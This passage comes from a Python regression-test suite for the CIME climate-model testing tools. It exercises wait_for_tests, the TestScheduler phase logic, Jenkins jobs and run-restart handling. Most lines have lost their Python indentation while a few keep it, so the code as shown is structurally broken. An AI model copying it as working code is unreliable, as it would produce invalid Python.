self._timestamp = CIME.utils.get_timestamp()
# basic tests
self._testdir_all_pass = os.path.join(self._testroot, 'scripts_regression_tests.testdir_all_pass')
self._testdir_with_fail = os.path.join(self._testroot, 'scripts_regression_tests.testdir_with_fail')
self._testdir_unfinished = os.path.join(self._testroot, 'scripts_regression_tests.testdir_unfinished')
self._testdir_unfinished2 = os.path.join(self._testroot, 'scripts_regression_tests.testdir_unfinished2')
# live tests
self._testdir_teststatus1 = os.path.join(self._testroot, 'scripts_regression_tests.testdir_teststatus1')
self._testdir_teststatus2 = os.path.join(self._testroot, 'scripts_regression_tests.testdir_teststatus2')
self._testdirs = [self._testdir_all_pass, self._testdir_with_fail, self._testdir_unfinished, self._testdir_unfinished2,
self._testdir_teststatus1, self._testdir_teststatus2]
basic_tests = self._testdirs[:self._testdirs.index(self._testdir_teststatus1)]
for testdir in self._testdirs:
if os.path.exists(testdir):
shutil.rmtree(testdir)
os.makedirs(testdir)
for r in range(10):
for testdir in basic_tests:
os.makedirs(os.path.join(testdir, str(r)))
make_fake_teststatus(os.path.join(testdir, str(r)), "Test_%d" % r, TEST_PASS_STATUS, RUN_PHASE)
make_fake_teststatus(os.path.join(self._testdir_with_fail, "5"), "Test_5", TEST_FAIL_STATUS, RUN_PHASE)
make_fake_teststatus(os.path.join(self._testdir_unfinished, "5"), "Test_5", TEST_PEND_STATUS, RUN_PHASE)
make_fake_teststatus(os.path.join(self._testdir_unfinished2, "5"), "Test_5", TEST_PASS_STATUS, SUBMIT_PHASE)
integration_tests = self._testdirs[len(basic_tests):]
for integration_test in integration_tests:
os.makedirs(os.path.join(integration_test, "0"))
make_fake_teststatus(os.path.join(integration_test, "0"), "Test_0", TEST_PASS_STATUS, CORE_PHASES[0])
# Set up proxy if possible
self._unset_proxy = setup_proxy()
self._thread_error = None
###########################################################################
def tearDown(self):
###########################################################################
do_teardown = sys.exc_info() == (None, None, None) and not NO_TEARDOWN
if do_teardown:
for testdir in self._testdirs:
shutil.rmtree(testdir)
kill_subprocesses()
if (self._unset_proxy):
del os.environ["http_proxy"]
###########################################################################
def simple_test(self, testdir, expected_results, extra_args="", build_name=None):
###########################################################################
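        """
        Run wait_for_tests on every TestStatus file under testdir and compare
        the reported per-test results against expected_results. A nonzero exit
        status is expected whenever any expected result is not PASS.
        """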
# Need these flags to test dashboard if e3sm
if CIME.utils.get_model() == "e3sm" and build_name is not None:
extra_args += " -b %s" % build_name
expected_stat = 0 if expected_results == ["PASS"]*len(expected_results) else CIME.utils.TESTS_FAILED_ERR_CODE
output = run_cmd_assert_result(self, "%s/wait_for_tests -p ACME_test */TestStatus %s" % (TOOLS_DIR, extra_args),
from_dir=testdir, expected_stat=expected_stat)
lines = [line for line in output.splitlines() if line.startswith("Test '")]
self.assertEqual(len(lines), len(expected_results))
for idx, line in enumerate(lines):
testname, status = parse_test_status(line)
self.assertEqual(status, expected_results[idx])
self.assertEqual(testname, "Test_%d" % idx)
###########################################################################
def threaded_test(self, testdir, expected_results, extra_args="", build_name=None):
###########################################################################
try:
self.simple_test(testdir, expected_results, extra_args, build_name)
except AssertionError as e:
self._thread_error = str(e)
###########################################################################
def test_wait_for_test_all_pass(self):
###########################################################################
self.simple_test(self._testdir_all_pass, ["PASS"] * 10)
###########################################################################
def test_wait_for_test_with_fail(self):
###########################################################################
expected_results = ["FAIL" if item == 5 else "PASS" for item in range(10)]
self.simple_test(self._testdir_with_fail, expected_results)
###########################################################################
def test_wait_for_test_no_wait(self):
###########################################################################
expected_results = ["PEND" if item == 5 else "PASS" for item in range(10)]
self.simple_test(self._testdir_unfinished, expected_results, "-n")
###########################################################################
def test_wait_for_test_timeout(self):
###########################################################################
expected_results = ["PEND" if item == 5 else "PASS" for item in range(10)]
self.simple_test(self._testdir_unfinished, expected_results, "--timeout=3")
###########################################################################
def test_wait_for_test_wait_for_pend(self):
###########################################################################
run_thread = threading.Thread(target=self.threaded_test, args=(self._testdir_unfinished, ["PASS"] * 10))
run_thread.daemon = True
run_thread.start()
time.sleep(5) # Kinda hacky
        self.assertTrue(run_thread.is_alive(), msg="wait_for_tests should have waited")
with TestStatus(test_dir=os.path.join(self._testdir_unfinished, "5")) as ts:
ts.set_status(RUN_PHASE, TEST_PASS_STATUS)
run_thread.join(timeout=10)
        self.assertFalse(run_thread.is_alive(), msg="wait_for_tests should have finished")
self.assertTrue(self._thread_error is None, msg="Thread had failure: %s" % self._thread_error)
###########################################################################
def test_wait_for_test_wait_for_missing_run_phase(self):
###########################################################################
run_thread = threading.Thread(target=self.threaded_test, args=(self._testdir_unfinished2, ["PASS"] * 10))
run_thread.daemon = True
run_thread.start()
time.sleep(5) # Kinda hacky
        self.assertTrue(run_thread.is_alive(), msg="wait_for_tests should have waited")
with TestStatus(test_dir=os.path.join(self._testdir_unfinished2, "5")) as ts:
ts.set_status(RUN_PHASE, TEST_PASS_STATUS)
run_thread.join(timeout=10)
        self.assertFalse(run_thread.is_alive(), msg="wait_for_tests should have finished")
self.assertTrue(self._thread_error is None, msg="Thread had failure: %s" % self._thread_error)
###########################################################################
def test_wait_for_test_wait_kill(self):
###########################################################################
expected_results = ["PEND" if item == 5 else "PASS" for item in range(10)]
run_thread = threading.Thread(target=self.threaded_test, args=(self._testdir_unfinished, expected_results))
run_thread.daemon = True
run_thread.start()
time.sleep(5)
        self.assertTrue(run_thread.is_alive(), msg="wait_for_tests should have waited")
kill_python_subprocesses(signal.SIGTERM, expected_num_killed=1, tester=self)
run_thread.join(timeout=10)
        self.assertFalse(run_thread.is_alive(), msg="wait_for_tests should have finished")
self.assertTrue(self._thread_error is None, msg="Thread had failure: %s" % self._thread_error)
###########################################################################
def test_wait_for_test_cdash_pass(self):
###########################################################################
expected_results = ["PASS"] * 10
build_name = "regression_test_pass_" + self._timestamp
run_thread = threading.Thread(target=self.threaded_test,
args=(self._testdir_all_pass, expected_results, "", build_name))
run_thread.daemon = True
run_thread.start()
run_thread.join(timeout=10)
        self.assertFalse(run_thread.is_alive(), msg="wait_for_tests should have finished")
self.assertTrue(self._thread_error is None, msg="Thread had failure: %s" % self._thread_error)
assert_dashboard_has_build(self, build_name)
###########################################################################
def test_wait_for_test_cdash_kill(self):
###########################################################################
expected_results = ["PEND" if item == 5 else "PASS" for item in range(10)]
build_name = "regression_test_kill_" + self._timestamp
run_thread = threading.Thread(target=self.threaded_test,
args=(self._testdir_unfinished, expected_results, "", build_name))
run_thread.daemon = True
run_thread.start()
time.sleep(5)
        self.assertTrue(run_thread.is_alive(), msg="wait_for_tests should have waited")
kill_python_subprocesses(signal.SIGTERM, expected_num_killed=1, tester=self)
run_thread.join(timeout=10)
        self.assertFalse(run_thread.is_alive(), msg="wait_for_tests should have finished")
self.assertTrue(self._thread_error is None, msg="Thread had failure: %s" % self._thread_error)
assert_dashboard_has_build(self, build_name)
if CIME.utils.get_model() == "e3sm":
cdash_result_dir = os.path.join(self._testdir_unfinished, "Testing")
tag_file = os.path.join(cdash_result_dir, "TAG")
self.assertTrue(os.path.isdir(cdash_result_dir))
self.assertTrue(os.path.isfile(tag_file))
tag = open(tag_file, "r").readlines()[0].strip()
xml_file = os.path.join(cdash_result_dir, tag, "Test.xml")
self.assertTrue(os.path.isfile(xml_file))
xml_contents = open(xml_file, "r").read()
self.assertTrue(r'<TestList><Test>Test_0</Test><Test>Test_1</Test><Test>Test_2</Test><Test>Test_3</Test><Test>Test_4</Test><Test>Test_5</Test><Test>Test_6</Test><Test>Test_7</Test><Test>Test_8</Test><Test>Test_9</Test></TestList>'
in xml_contents)
self.assertTrue(r'<Test Status="notrun"><Name>Test_5</Name>' in xml_contents)
# TODO: Any further checking of xml output worth doing?
###########################################################################
def live_test_impl(self, testdir, expected_results, last_phase, last_status):
###########################################################################
run_thread = threading.Thread(target=self.threaded_test, args=(testdir, expected_results))
run_thread.daemon = True
run_thread.start()
time.sleep(5)
        self.assertTrue(run_thread.is_alive(), msg="wait_for_tests should have waited")
for core_phase in CORE_PHASES[1:]:
with TestStatus(test_dir=os.path.join(self._testdir_teststatus1, "0")) as ts:
ts.set_status(core_phase, last_status if core_phase == last_phase else TEST_PASS_STATUS)
time.sleep(5)
if core_phase != last_phase:
                self.assertTrue(run_thread.is_alive(), msg="wait_for_tests should have waited after passing phase {}".format(core_phase))
else:
run_thread.join(timeout=10)
                self.assertFalse(run_thread.is_alive(), msg="wait_for_tests should have finished after phase {}".format(core_phase))
break
self.assertTrue(self._thread_error is None, msg="Thread had failure: %s" % self._thread_error)
###########################################################################
def test_wait_for_test_test_status_integration_pass(self):
###########################################################################
self.live_test_impl(self._testdir_teststatus1, ["PASS"], RUN_PHASE, TEST_PASS_STATUS)
###########################################################################
def test_wait_for_test_test_status_integration_submit_fail(self):
###########################################################################
self.live_test_impl(self._testdir_teststatus1, ["FAIL"], SUBMIT_PHASE, TEST_FAIL_STATUS)
###############################################################################
class TestCreateTestCommon(unittest.TestCase):
###############################################################################
###########################################################################
def setUp(self):
###########################################################################
self._thread_error = None
self._unset_proxy = setup_proxy()
self._machine = MACHINE.get_machine_name()
self._compiler = MACHINE.get_default_compiler() if TEST_COMPILER is None else TEST_COMPILER
self._baseline_name = "fake_testing_only_%s" % CIME.utils.get_timestamp()
self._baseline_area = os.path.join(TEST_ROOT, "baselines")
self._testroot = TEST_ROOT
self._hasbatch = MACHINE.has_batch_system() and not NO_BATCH
self._do_teardown = not NO_TEARDOWN
###########################################################################
def tearDown(self):
###########################################################################
kill_subprocesses()
if (self._unset_proxy):
del os.environ["http_proxy"]
files_to_clean = []
baselines = os.path.join(self._baseline_area, self._baseline_name)
if (os.path.isdir(baselines)):
files_to_clean.append(baselines)
for test_id in ["master", self._baseline_name]:
for leftover in glob.glob(os.path.join(self._testroot, "*%s*" % test_id)):
files_to_clean.append(leftover)
do_teardown = self._do_teardown and sys.exc_info() == (None, None, None)
if (not do_teardown and files_to_clean):
            print("Detected failed test or user requested no teardown")
            print("Leaving files:")
for file_to_clean in files_to_clean:
print(" " + file_to_clean)
else:
            # For batch machines we need to avoid a race condition while the
            # batch system finishes I/O for the case.
if self._hasbatch:
time.sleep(5)
for file_to_clean in files_to_clean:
if (os.path.isdir(file_to_clean)):
shutil.rmtree(file_to_clean)
else:
os.remove(file_to_clean)
###########################################################################
def _create_test(self, extra_args, test_id=None, pre_run_errors=False, run_errors=False, env_changes=""):
###########################################################################
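        """
        Invoke create_test with extra_args plus the standard test-id, baseline,
        compiler, mpilib and root options used by this test suite, then (for a
        full run) wait for the tests to finish with the expected status.
        """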
        # The all-stub compset is not supported by the nuopc driver, so exclude that test
driver = CIME.utils.get_cime_default_driver()
if driver == 'nuopc':
extra_args.append(" ^SMS.T42_T42.S")
test_id = CIME.utils.get_timestamp() if test_id is None else test_id
extra_args.append("-t {}".format(test_id))
extra_args.append("--baseline-root {}".format(self._baseline_area))
if NO_BATCH:
extra_args.append("--no-batch")
if TEST_COMPILER and ([extra_arg for extra_arg in extra_args if "--compiler" in extra_arg] == []):
extra_args.append("--compiler={}".format(TEST_COMPILER))
if TEST_MPILIB and ([extra_arg for extra_arg in extra_args if "--mpilib" in extra_arg] == []):
extra_args.append("--mpilib={}".format(TEST_MPILIB))
extra_args.append("--test-root={0} --output-root={0}".format(TEST_ROOT))
full_run = (set(extra_args) & set(["-n", "--namelist-only", "--no-setup", "--no-build"])) == set()
if self._hasbatch:
expected_stat = 0 if not pre_run_errors else CIME.utils.TESTS_FAILED_ERR_CODE
else:
expected_stat = 0 if not pre_run_errors and not run_errors else CIME.utils.TESTS_FAILED_ERR_CODE
run_cmd_assert_result(self, "{} {}/create_test {}".format(env_changes, SCRIPT_DIR, " ".join(extra_args)),
expected_stat=expected_stat)
if full_run:
self._wait_for_tests(test_id, expect_works=(not pre_run_errors and not run_errors))
###########################################################################
def _wait_for_tests(self, test_id, expect_works=True):
###########################################################################
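        """
        On batch machines, run wait_for_tests on all cases matching test_id and
        expect success or failure according to expect_works. A no-op without a
        batch system.
        """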
if self._hasbatch:
timeout_arg = "--timeout={}".format(GLOBAL_TIMEOUT) if GLOBAL_TIMEOUT is not None else ""
expected_stat = 0 if expect_works else CIME.utils.TESTS_FAILED_ERR_CODE
run_cmd_assert_result(self, "{}/wait_for_tests {} *{}/TestStatus".format(TOOLS_DIR, timeout_arg, test_id),
from_dir=self._testroot, expected_stat=expected_stat)
###############################################################################
class O_TestTestScheduler(TestCreateTestCommon):
###############################################################################
###########################################################################
def test_a_phases(self):
###########################################################################
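        """
        Drive TestScheduler._update_test_status through each phase by hand and
        check the _is_broken/_work_remains bookkeeping, including the
        transitions that are expected to raise CIMEError.
        """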
        # exclude the MEMLEAK and other special-case failure tests here; three tests should remain.
tests = get_tests.get_full_test_names(["cime_test_only",
"^TESTMEMLEAKFAIL_P1.f09_g16.X",
"^TESTMEMLEAKPASS_P1.f09_g16.X",
"^TESTRUNSTARCFAIL_P1.f19_g16_rx1.A",
"^TESTTESTDIFF_P1.f19_g16_rx1.A",
"^TESTBUILDFAILEXC_P1.f19_g16_rx1.A",
"^TESTRUNFAILEXC_P1.f19_g16_rx1.A"],
self._machine, self._compiler)
self.assertEqual(len(tests), 3)
ct = TestScheduler(tests, test_root=TEST_ROOT, output_root=TEST_ROOT,
compiler=self._compiler, mpilib=TEST_MPILIB)
build_fail_test = [item for item in tests if "TESTBUILDFAIL" in item][0]
run_fail_test = [item for item in tests if "TESTRUNFAIL" in item][0]
pass_test = [item for item in tests if "TESTRUNPASS" in item][0]
self.assertTrue("BUILDFAIL" in build_fail_test, msg="Wrong test '%s'" % build_fail_test)
self.assertTrue("RUNFAIL" in run_fail_test, msg="Wrong test '%s'" % run_fail_test)
self.assertTrue("RUNPASS" in pass_test, msg="Wrong test '%s'" % pass_test)
for idx, phase in enumerate(ct._phases):
for test in ct._tests:
if (phase == CIME.test_scheduler.TEST_START):
continue
elif (phase == MODEL_BUILD_PHASE):
ct._update_test_status(test, phase, TEST_PEND_STATUS)
if (test == build_fail_test):
ct._update_test_status(test, phase, TEST_FAIL_STATUS)
self.assertTrue(ct._is_broken(test))
self.assertFalse(ct._work_remains(test))
else:
ct._update_test_status(test, phase, TEST_PASS_STATUS)
self.assertFalse(ct._is_broken(test))
self.assertTrue(ct._work_remains(test))
elif (phase == RUN_PHASE):
if (test == build_fail_test):
with self.assertRaises(CIMEError):
ct._update_test_status(test, phase, TEST_PEND_STATUS)
else:
ct._update_test_status(test, phase, TEST_PEND_STATUS)
self.assertFalse(ct._work_remains(test))
if (test == run_fail_test):
ct._update_test_status(test, phase, TEST_FAIL_STATUS)
self.assertTrue(ct._is_broken(test))
else:
ct._update_test_status(test, phase, TEST_PASS_STATUS)
self.assertFalse(ct._is_broken(test))
self.assertFalse(ct._work_remains(test))
else:
with self.assertRaises(CIMEError):
ct._update_test_status(test, ct._phases[idx+1], TEST_PEND_STATUS)
with self.assertRaises(CIMEError):
ct._update_test_status(test, phase, TEST_PASS_STATUS)
ct._update_test_status(test, phase, TEST_PEND_STATUS)
self.assertFalse(ct._is_broken(test))
self.assertTrue(ct._work_remains(test))
with self.assertRaises(CIMEError):
ct._update_test_status(test, phase, TEST_PEND_STATUS)
ct._update_test_status(test, phase, TEST_PASS_STATUS)
with self.assertRaises(CIMEError):
ct._update_test_status(test, phase, TEST_FAIL_STATUS)
self.assertFalse(ct._is_broken(test))
self.assertTrue(ct._work_remains(test))
###########################################################################
def test_b_full(self):
###########################################################################
tests = get_tests.get_full_test_names(["cime_test_only"], self._machine, self._compiler)
test_id="%s-%s" % (self._baseline_name, CIME.utils.get_timestamp())
ct = TestScheduler(tests, test_id=test_id, no_batch=NO_BATCH, test_root=TEST_ROOT,
output_root=TEST_ROOT,compiler=self._compiler, mpilib=TEST_MPILIB)
build_fail_test = [item for item in tests if "TESTBUILDFAIL_" in item][0]
build_fail_exc_test = [item for item in tests if "TESTBUILDFAILEXC" in item][0]
run_fail_test = [item for item in tests if "TESTRUNFAIL_" in item][0]
run_fail_exc_test = [item for item in tests if "TESTRUNFAILEXC" in item][0]
pass_test = [item for item in tests if "TESTRUNPASS" in item][0]
test_diff_test = [item for item in tests if "TESTTESTDIFF" in item][0]
mem_fail_test = [item for item in tests if "TESTMEMLEAKFAIL" in item][0]
mem_pass_test = [item for item in tests if "TESTMEMLEAKPASS" in item][0]
st_arch_fail_test = [item for item in tests if "TESTRUNSTARCFAIL" in item][0]
log_lvl = logging.getLogger().getEffectiveLevel()
logging.disable(logging.CRITICAL)
try:
ct.run_tests()
finally:
logging.getLogger().setLevel(log_lvl)
self._wait_for_tests(test_id, expect_works=False)
test_statuses = glob.glob("%s/*%s/TestStatus" % (self._testroot, test_id))
self.assertEqual(len(tests), len(test_statuses))
for test_status in test_statuses:
ts = TestStatus(test_dir=os.path.dirname(test_status))
test_name = ts.get_name()
log_files = glob.glob("%s/%s*%s/TestStatus.log" % (self._testroot, test_name, test_id))
self.assertEqual(len(log_files), 1, "Expected exactly one TestStatus.log file, found %d" % len(log_files))
log_file = log_files[0]
if (test_name == build_fail_test):
assert_test_status(self, test_name, ts, MODEL_BUILD_PHASE, TEST_FAIL_STATUS)
data = open(log_file, "r").read()
self.assertTrue("Intentional fail for testing infrastructure" in data,
"Broken test did not report build error:\n%s" % data)
elif (test_name == build_fail_exc_test):
data = open(log_file, "r").read()
assert_test_status(self, test_name, ts, SHAREDLIB_BUILD_PHASE, TEST_FAIL_STATUS)
self.assertTrue("Exception from init" in data,
"Broken test did not report build error:\n%s" % data)
elif (test_name == run_fail_test):
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_FAIL_STATUS)
elif (test_name == run_fail_exc_test):
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_FAIL_STATUS)
data = open(log_file, "r").read()
self.assertTrue("Exception from run_phase" in data,
"Broken test did not report run error:\n%s" % data)
elif (test_name == mem_fail_test):
assert_test_status(self, test_name, ts, MEMLEAK_PHASE, TEST_FAIL_STATUS)
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_PASS_STATUS)
elif (test_name == test_diff_test):
assert_test_status(self, test_name, ts, "COMPARE_base_rest", TEST_FAIL_STATUS)
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_PASS_STATUS)
elif test_name == st_arch_fail_test:
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_PASS_STATUS)
assert_test_status(self, test_name, ts, STARCHIVE_PHASE, TEST_FAIL_STATUS)
else:
self.assertTrue(test_name in [pass_test, mem_pass_test])
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_PASS_STATUS)
if (test_name == mem_pass_test):
assert_test_status(self, test_name, ts, MEMLEAK_PHASE, TEST_PASS_STATUS)
###########################################################################
def test_c_use_existing(self):
###########################################################################
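        """
        Run a small suite with deliberate build and run failures, then re-run
        it with use_existing=True (and the *_PASS environment overrides) and
        verify the previously failed phases now pass; a final re-run confirms
        that passed tests are not re-run.
        """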
tests = get_tests.get_full_test_names(["TESTBUILDFAIL_P1.f19_g16_rx1.A", "TESTRUNFAIL_P1.f19_g16_rx1.A", "TESTRUNPASS_P1.f19_g16_rx1.A"],
self._machine, self._compiler)
test_id="%s-%s" % (self._baseline_name, CIME.utils.get_timestamp())
ct = TestScheduler(tests, test_id=test_id, no_batch=NO_BATCH, test_root=TEST_ROOT,
output_root=TEST_ROOT,compiler=self._compiler, mpilib=TEST_MPILIB)
build_fail_test = [item for item in tests if "TESTBUILDFAIL" in item][0]
run_fail_test = [item for item in tests if "TESTRUNFAIL" in item][0]
pass_test = [item for item in tests if "TESTRUNPASS" in item][0]
log_lvl = logging.getLogger().getEffectiveLevel()
logging.disable(logging.CRITICAL)
try:
ct.run_tests()
finally:
logging.getLogger().setLevel(log_lvl)
test_statuses = glob.glob("%s/*%s/TestStatus" % (self._testroot, test_id))
self.assertEqual(len(tests), len(test_statuses))
self._wait_for_tests(test_id, expect_works=False)
for test_status in test_statuses:
casedir = os.path.dirname(test_status)
ts = TestStatus(test_dir=casedir)
test_name = ts.get_name()
if test_name == build_fail_test:
assert_test_status(self, test_name, ts, MODEL_BUILD_PHASE, TEST_FAIL_STATUS)
with TestStatus(test_dir=casedir) as ts:
ts.set_status(MODEL_BUILD_PHASE, TEST_PEND_STATUS)
elif test_name == run_fail_test:
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_FAIL_STATUS)
with TestStatus(test_dir=casedir) as ts:
ts.set_status(SUBMIT_PHASE, TEST_PEND_STATUS)
else:
self.assertTrue(test_name == pass_test)
assert_test_status(self, test_name, ts, MODEL_BUILD_PHASE, TEST_PASS_STATUS)
assert_test_status(self, test_name, ts, SUBMIT_PHASE, TEST_PASS_STATUS)
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_PASS_STATUS)
os.environ["TESTBUILDFAIL_PASS"] = "True"
os.environ["TESTRUNFAIL_PASS"] = "True"
ct2 = TestScheduler(tests, test_id=test_id, no_batch=NO_BATCH, use_existing=True,
test_root=TEST_ROOT,output_root=TEST_ROOT,compiler=self._compiler,
mpilib=TEST_MPILIB)
log_lvl = logging.getLogger().getEffectiveLevel()
logging.disable(logging.CRITICAL)
try:
ct2.run_tests()
finally:
logging.getLogger().setLevel(log_lvl)
self._wait_for_tests(test_id)
for test_status in test_statuses:
ts = TestStatus(test_dir=os.path.dirname(test_status))
test_name = ts.get_name()
assert_test_status(self, test_name, ts, MODEL_BUILD_PHASE, TEST_PASS_STATUS)
assert_test_status(self, test_name, ts, SUBMIT_PHASE, TEST_PASS_STATUS)
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_PASS_STATUS)
del os.environ["TESTBUILDFAIL_PASS"]
del os.environ["TESTRUNFAIL_PASS"]
# test that passed tests are not re-run
ct2 = TestScheduler(tests, test_id=test_id, no_batch=NO_BATCH, use_existing=True,
test_root=TEST_ROOT,output_root=TEST_ROOT,compiler=self._compiler,
mpilib=TEST_MPILIB)
log_lvl = logging.getLogger().getEffectiveLevel()
logging.disable(logging.CRITICAL)
try:
ct2.run_tests()
finally:
logging.getLogger().setLevel(log_lvl)
self._wait_for_tests(test_id)
for test_status in test_statuses:
ts = TestStatus(test_dir=os.path.dirname(test_status))
test_name = ts.get_name()
assert_test_status(self, test_name, ts, MODEL_BUILD_PHASE, TEST_PASS_STATUS)
assert_test_status(self, test_name, ts, SUBMIT_PHASE, TEST_PASS_STATUS)
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_PASS_STATUS)
###########################################################################
def test_d_retry(self):
###########################################################################
args = ["TESTBUILDFAIL_P1.f19_g16_rx1.A", "TESTRUNFAIL_P1.f19_g16_rx1.A", "TESTRUNPASS_P1.f19_g16_rx1.A", "--retry=1"]
self._create_test(args)
###############################################################################
class P_TestJenkinsGenericJob(TestCreateTestCommon):
###############################################################################
###########################################################################
def setUp(self):
###########################################################################
if CIME.utils.get_model() != "e3sm":
self.skipTest("Skipping Jenkins tests. E3SM feature")
TestCreateTestCommon.setUp(self)
# Need to run in a subdir in order to not have CTest clash. Name it
# such that it should be cleaned up by the parent tearDown
self._testdir = os.path.join(self._testroot, "jenkins_test_%s" % self._baseline_name)
os.makedirs(self._testdir)
# Change root to avoid clashing with other jenkins_generic_jobs
self._jenkins_root = os.path.join(self._testdir, "J")
###########################################################################
def tearDown(self):
###########################################################################
TestCreateTestCommon.tearDown(self)
if "TESTRUNDIFF_ALTERNATE" in os.environ:
del os.environ["TESTRUNDIFF_ALTERNATE"]
###########################################################################
def simple_test(self, expect_works, extra_args, build_name=None):
###########################################################################
if NO_BATCH:
extra_args += " --no-batch"
# Need these flags to test dashboard if e3sm
if CIME.utils.get_model() == "e3sm" and build_name is not None:
extra_args += " -p ACME_test --submit-to-cdash --cdash-build-group=Nightly -c %s" % build_name
run_cmd_assert_result(self, "%s/jenkins_generic_job -r %s %s -B %s" % (TOOLS_DIR, self._testdir, extra_args, self._baseline_area),
from_dir=self._testdir, expected_stat=(0 if expect_works else CIME.utils.TESTS_FAILED_ERR_CODE))
###########################################################################
def threaded_test(self, expect_works, extra_args, build_name=None):
###########################################################################
try:
self.simple_test(expect_works, extra_args, build_name)
except AssertionError as e:
self._thread_error = str(e)
###########################################################################
def assert_num_leftovers(self, suite):
###########################################################################
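        """
        Assert that the number of case directories left under the jenkins root
        matches the number of tests in the given suite.
        """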
num_tests_in_tiny = len(get_tests.get_test_suite(suite))
jenkins_dirs = glob.glob("%s/*%s*/" % (self._jenkins_root, self._baseline_name.capitalize())) # case dirs
# scratch_dirs = glob.glob("%s/*%s*/" % (self._testroot, test_id)) # blr/run dirs
self.assertEqual(num_tests_in_tiny, len(jenkins_dirs),
msg="Wrong number of leftover directories in %s, expected %d, see %s" % \
(self._jenkins_root, num_tests_in_tiny, jenkins_dirs))
# JGF: Can't test this at the moment due to root change flag given to jenkins_generic_job
# self.assertEqual(num_tests_in_tiny + 1, len(scratch_dirs),
# msg="Wrong number of leftover directories in %s, expected %d, see %s" % \
# (self._testroot, num_tests_in_tiny, scratch_dirs))
###########################################################################
def test_jenkins_generic_job(self):
###########################################################################
# Generate fresh baselines so that this test is not impacted by
# unresolved diffs
self.simple_test(True, "-t cime_test_only_pass -g -b %s" % self._baseline_name)
self.assert_num_leftovers("cime_test_only_pass")
build_name = "jenkins_generic_job_pass_%s" % CIME.utils.get_timestamp()
self.simple_test(True, "-t cime_test_only_pass -b %s" % self._baseline_name, build_name=build_name)
self.assert_num_leftovers("cime_test_only_pass") # jenkins_generic_job should have automatically cleaned up leftovers from prior run
assert_dashboard_has_build(self, build_name)
###########################################################################
def test_jenkins_generic_job_kill(self):
###########################################################################
build_name = "jenkins_generic_job_kill_%s" % CIME.utils.get_timestamp()
run_thread = threading.Thread(target=self.threaded_test, args=(False, " -t cime_test_only_slow_pass -b master --baseline-compare=no", build_name))
run_thread.daemon = True
run_thread.start()
time.sleep(120)
kill_subprocesses(sig=signal.SIGTERM)
run_thread.join(timeout=30)
        self.assertFalse(run_thread.is_alive(), msg="jenkins_generic_job should have finished")
self.assertTrue(self._thread_error is None, msg="Thread had failure: %s" % self._thread_error)
assert_dashboard_has_build(self, build_name)
###########################################################################
def test_jenkins_generic_job_realistic_dash(self):
###########################################################################
# The actual quality of the cdash results for this test can only
# be inspected manually
# Generate fresh baselines so that this test is not impacted by
# unresolved diffs
self.simple_test(False, "-t cime_test_all -g -b %s" % self._baseline_name)
self.assert_num_leftovers("cime_test_all")
# Should create a diff
os.environ["TESTRUNDIFF_ALTERNATE"] = "True"
# Should create a nml diff
# Modify namelist
fake_nl = """
&fake_nml
fake_item = 'fake'
fake = .true.
/"""
baseline_glob = glob.glob(os.path.join(self._baseline_area, self._baseline_name, "TESTRUNPASS*"))
self.assertEqual(len(baseline_glob), 1, msg="Expected one match, got:\n%s" % "\n".join(baseline_glob))
for baseline_dir in baseline_glob:
nl_path = os.path.join(baseline_dir, "CaseDocs", "datm_in")
self.assertTrue(os.path.isfile(nl_path), msg="Missing file %s" % nl_path)
os.chmod(nl_path, osstat.S_IRUSR | osstat.S_IWUSR)
with open(nl_path, "a") as nl_file:
nl_file.write(fake_nl)
build_name = "jenkins_generic_job_mixed_%s" % CIME.utils.get_timestamp()
self.simple_test(False, "-t cime_test_all -b %s" % self._baseline_name, build_name=build_name)
self.assert_num_leftovers("cime_test_all") # jenkins_generic_job should have automatically cleaned up leftovers from prior run
assert_dashboard_has_build(self, build_name)
###############################################################################
class M_TestCimePerformance(TestCreateTestCommon):
###############################################################################
###########################################################################
def test_cime_case_ctrl_performance(self):
###########################################################################
ts = time.time()
num_repeat = 5
for _ in range(num_repeat):
self._create_test(["cime_tiny","--no-build"])
elapsed = time.time() - ts
        print("Perf test result: {:0.2f} seconds".format(elapsed))
###############################################################################
class T_TestRunRestart(TestCreateTestCommon):
###############################################################################
###########################################################################
def test_run_restart(self):
###########################################################################
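        """
        Run the NODEFAIL single-processor test and check that the FAIL_SENTINEL
        file in the run directory records exactly three simulated failures.
        """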
driver = CIME.utils.get_cime_default_driver()
if driver == "mct":
walltime="00:15:00"
else:
walltime="00:30:00"
self._create_test(["--walltime "+walltime,"NODEFAIL_P1.f09_g16.X"], test_id=self._baseline_name)
casedir = os.path.join(self._testroot,
"{}.{}".format(CIME.utils.get_full_test_name("NODEFAIL_P1.f09_g16.X", machine=self._machine, compiler=self._compiler), self._baseline_name))
rundir = run_cmd_no_fail("./xmlquery RUNDIR --value", from_dir=casedir)
fail_sentinel = os.path.join(rundir, "FAIL_SENTINEL")
self.assertTrue(os.path.exists(fail_sentinel), msg="Missing %s" % fail_sentinel)
self.assertEqual(open(fail_sentinel, "r").read().count("FAIL"), 3)
###########################################################################
def test_run_restart_too_many_fails(self):
###########################################################################
driver = CIME.utils.get_cime_default_driver()
if driver == "mct":
walltime="00:15:00"
else:
walltime="00:30:00"
self._create_test(["--walltime "+walltime,"NODEFAIL_P1.f09_g16.X"], test_id=self._baseline_name, env_changes="NODEFAIL_NUM_FAILS=5", run_errors=True)
casedir = os.path.join(self._testroot,
"{}.{}".format(CIME.utils.get_full_test_name("NODEFAIL_P1.f09_g16.X", machine=self._machine, compiler=self._compiler), self._baseline_name))
rundir = run_cmd_no_fail("./xmlquery RUNDIR --value", from_dir=casedir)
fail_sentinel = os.path.join(rundir, "FAIL_SENTINEL")
self.assertTrue(os.path.exists(fail_sentinel), msg="Missing %s" % fail_sentinel)
self.assertEqual(open(fail_sentinel, "r").read().count("FAIL"), 4)
###############################################################################
class Q_TestBlessTestResults(TestCreateTestCommon):
###############################################################################
###########################################################################
def setUp(self):
###########################################################################
TestCreateTestCommon.setUp(self)
# Set a restrictive umask so we can test that SharedAreas used for
# recording baselines are working
restrictive_mask = 0o027
self._orig_umask = os.umask(restrictive_mask)
###########################################################################
def tearDown(self):
###########################################################################
TestCreateTestCommon.tearDown(self)
